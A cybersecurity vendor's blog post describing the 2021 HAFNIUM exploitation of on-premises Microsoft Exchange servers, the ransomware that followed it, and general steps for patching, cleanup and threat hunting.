HAFNIUM: An Unprecedented Attack

HAFNIUM: The How, What, and Why of an Unprecedented Cybersecurity Attack.

The highly important ‘Patch Tuesday’ of 2nd March 2021 painted a previously unseen picture for the cybersecurity world as Microsoft released out-of-band security patches for its on-premises versions of Exchange Servers in light of what now is notoriously known as the ‘HAFNIUM Attack’.

The New Global Cybersecurity Threat on the Block.

HAFNIUM is out there in the wild, terrorizing the business world by exploiting multiple vulnerabilities present in the on-premises instances of Microsoft Exchange Server. The attack affected SMBs, large enterprises and governments – specifically anyone who ran the on-premises version. More than 60,000 on-premises installations were reported to have taken the brunt and the count is only increasing since the first instance of HAFNIUM attack was identified. It has shaped into a ‘Global Cybersecurity Crisis’ within a short period of time, posing a larger threat to commercial business and governance as a whole.

How HAFNIUM Came into Limelight.

From December 2020 through February 2021, several cybersecurity firms discovered the underlying existence of multiple vulnerabilities and alerted Microsoft about the vulnerabilities. Microsoft sprang into action to assess risk levels and accordingly provide immediate patches to mitigate the threat. In their patch release note, Microsoft claimed that the attack came from a cyber espionage group called HAFNIUM that has alleged ties to the Chinese government. The note further explained how these attacks are highly reckless in nature and strongly urged customers to update their on-premises systems immediately.

The Real Problem: Floodgates Opened.

For those who thought HAFNIUM was just a small glitch that could be fixed by applying patches, it turned out to be just the beginning. HAFNIUM acted as a free-for-all service and opened the gate wide open for any bad actor who wanted to get in. Riding on opportunity, various other threat actors jumped into the scene. According to ESET research, there were more than 10 different APT groups exploiting the vulnerabilities and different active variations of these attacks have been identified, including the manually operated ransomware Ransom:Win32/DoejoCrypt. Microsoft stated in its update on March 11 that the magnitude of HAFNIUM saw a multi-fold increase when other ransomware attackers began taking advantage of the native vulnerabilities in Microsoft Exchange Server.

According to IT Security Firm SOPHOS, DearCry began exploiting the ransomware attack using MS Exchange vulnerabilities, but with a twist. DearCry encrypted the customer files and deleted originals. It embedded the encryption keys in the ransomware binary, thus not having the need to establish contact with the attacker’s C&C to encrypt the target systems. Several product and service providers in the cybersecurity sector have noted that the ‘level of attacks’ and the ‘method of exploitation’ are unprecedented.

Why Patching Alone Doesn’t Solve the Problem at Hand.

Industry-wide research suggests that when a target is compromised, the attackers write web-shells to the system for future operations, meaning they create a backdoor. This backdoor allows attackers to return to the target system and conduct further activities such as privilege escalation, data dumping, planting ransomware, and compromising other systems in the network in lateral movements. Patching may help close the vulnerability, but the infection still resides inside the server/system. It would require a mature approach, well-defined process, and seamless execution to achieve optimum security levels.

For those who run on-premises Microsoft Exchange Server Versions 2010, 2013, 2016, or 2019 we suggest:

• Apply available patches immediately. If you can’t, take the server off-line as you would require an in-depth risk assessment to understand business impact.
• Run trusted tools available to clean the infection. If you can’t, reimage the system or restore it from backup.
• Conduct a thorough threat hunting exercise to discover/identify instances of other compromised systems in your enterprise environment.
• Apply patches to your security tools or upgrade to make them detect advanced attacks and patterns.
• Ensure the backup process is effective, and you have a clean copy of critical files and images for doomsday.
• Regularly conduct threat assessments to evaluate security posture.

It is recommended to seek professional help to manage your enterprise security risks and reduce exposure to such lethal cyberattacks. Reach out to Vistas’ Cybersecurity Team for further assistance.

Key Resources for Investigation and Updates.

We have compiled a list of numerous resources available online through Microsoft Resource Center and other security vendors to help investigate and mitigate the rapidly spreading HAFNIUM Threat.

• Microsoft Resource Center: Library of official Microsoft literature regarding HAFNIUM attacks
• Impact Investigation Guide: Step-by-step guide to detecting the presence of HAFNIUM
• Impact Investigation Script: Code for investigating logs for Indicators of Compromise (IOCs)
• CISA Tips Sheet: Steps for IT Security Staff to Remediate Microsoft Exchange Vulnerabilities
• MS Exchange On-premises Mitigation Tool: One-click mitigation tool to apply security updates

This is a real thing, and its very serious. For everyone and ourselves it is time to take a step back and look at the bigger picture. Review your processes, review your ecosystem and tweak it if necessary.

Together we secure more.

Manoje.